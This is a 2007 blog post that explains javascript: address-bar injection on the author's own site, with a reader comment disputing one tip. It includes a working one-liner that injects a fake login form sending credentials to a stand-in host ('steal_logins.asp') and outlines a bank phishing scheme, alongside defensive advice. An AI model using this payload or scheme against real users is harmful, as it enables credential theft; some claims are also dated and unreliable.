Friday, April 20, 2007

Hack My Web Site (using JavaScript Injection)

Wow. I like to keep myself educated on how people are hacking stuff so I can build secure solutions, but I may have bumped into a hack that is pretty darned smart and takes a bit of a techy to at least detect. Many of you may have heard about SQL Injection, where you put sql queries into an inputbox and the standard errors end up coming back telling you more information than you should get to know about the database behind a web site. Well this blog article is about how to take over part of a web site and spoof parts of the page using a technique called javascript injection. I will show you how it works, the likely way it will be implemented and how to watch for it.

To start: How it works. First off, understand this is an internet browser hack, and not a web site hack, so unless developers of internet browsers change how stuff works today, this technique should work going forward, dispite what people do on their site to dodge this. Understand that what I am about to tell you is educational with the hope that you education friends and family about how this works so they can avoid being attacked.

IF YOU DO ANY OF THIS, YOU COULD GET ARRESTED BECAUSE YOU WOULD BE BREAKING THE LAW.

So, now, on with it. We are going to hack my web site: http://enginpost.com so pop another browser window and load that URL.

Most modern browsers give you the ability to enter javascript in the address bar for testing purposes. This inherent weakness is what we are about to exploit.

Here we go:
  1. Click on my resume and notice where the content goes to on the webpage. If you were to examine the HTML under the page you would see that the content is being Fjaxed (like Ajax, but better) into the DIV with the ID "FlashJxContent." You can quickly view the content of whatever is currently in that DIV by pasting the following code into your browsers address bar:

    javascript: alert(document.getElementById('FlashJxContent').innerHTML)
  2. That should show you the HTML inside the DIV. Now let's image my website was secure and people would come to it to login. I am a nasty human being and I want to harvest peoples login usernames and passwords. So what I want to do is create a fake form to gather this information and submit the details to a page on another website (where I gather the info and save it to my little database.) Since we know how to read the innerHTML of a DIV, we should be able to write to it as well.
  3. I want to get a fake form into the DIV where the HTML looks something like:


    Enter Username:

    Enter Password:




    Notice that the form submits the results to another website. Horrible, right?
  4. To get this form into an existing webpage, paste the following javascript into the URL:

    javascript:void(document.getElementById('FlashJxContent').innerHTML = " <form action='http:www.SomeTemporarySite.com/steal_logins.asp' method='get'> Enter Username: <input id='UID' type='text'><BR /> Enter Password: <input id='PWD' type='password'> <input type='submit' value='Login'> </form>")

Wow, huh? Notice that the title in the address bar shows that we are on the same site, even though the URL is a little wierd (but then again, how many users really understand what is going on in a URL?) If you wanted to change a few more areas of the page, the bad dude only has to add a semicolon after the double-quote and before the end parenthesis to add another line of javascript and write to another DIV at the same time.

HOW would this likely be implemented?

I hate to write this part because people could use this like instructions, so I won't go into a ton of specific detail, but basically...

If someone sent out an email saying you need to go to your account and fix something at your bank, the link could say "login to your bank" in your HTML-enabled email, but really point to that nasty website. The page that loads could say "loading Your Community Bank secure login..." and pop another window that hides the address bar. This window would really load your banks website. Then a few seconds later the original page would load the javascript into the location on that other popped page (I have not tested this, but I think I would work, since we opened the page to begin with.) At that point you would be on your banks website but filling out a form that really has nothing to do with your website.

HOW do you gaurd family and friends against this?

  1. Tell them not to fill out web forms that don't show the address in the address bar of the browser. if the URL seems funny, don't use the form.
  2. Watch for the address to where the form submits. If you hover over the submit button, notice that it tells you that it is headed away from the enginpost website (in the above example.) The average Joe may not be aware of this and it may seem a little techy a thing to do, but these days, that may yet be required.

Other than that, there isn't much more we can do to protect ourselves from this hack.

Posted by at
Labels: , , ,

1 comment:

Anonymous said...

"If you hover over the submit button, notice that it tells you that it is headed away from the enginpost website"

Not true in FireFox.

April 20, 2007 at 11:16 AM

Post a Comment

Subscribe to: Post Comments (Atom)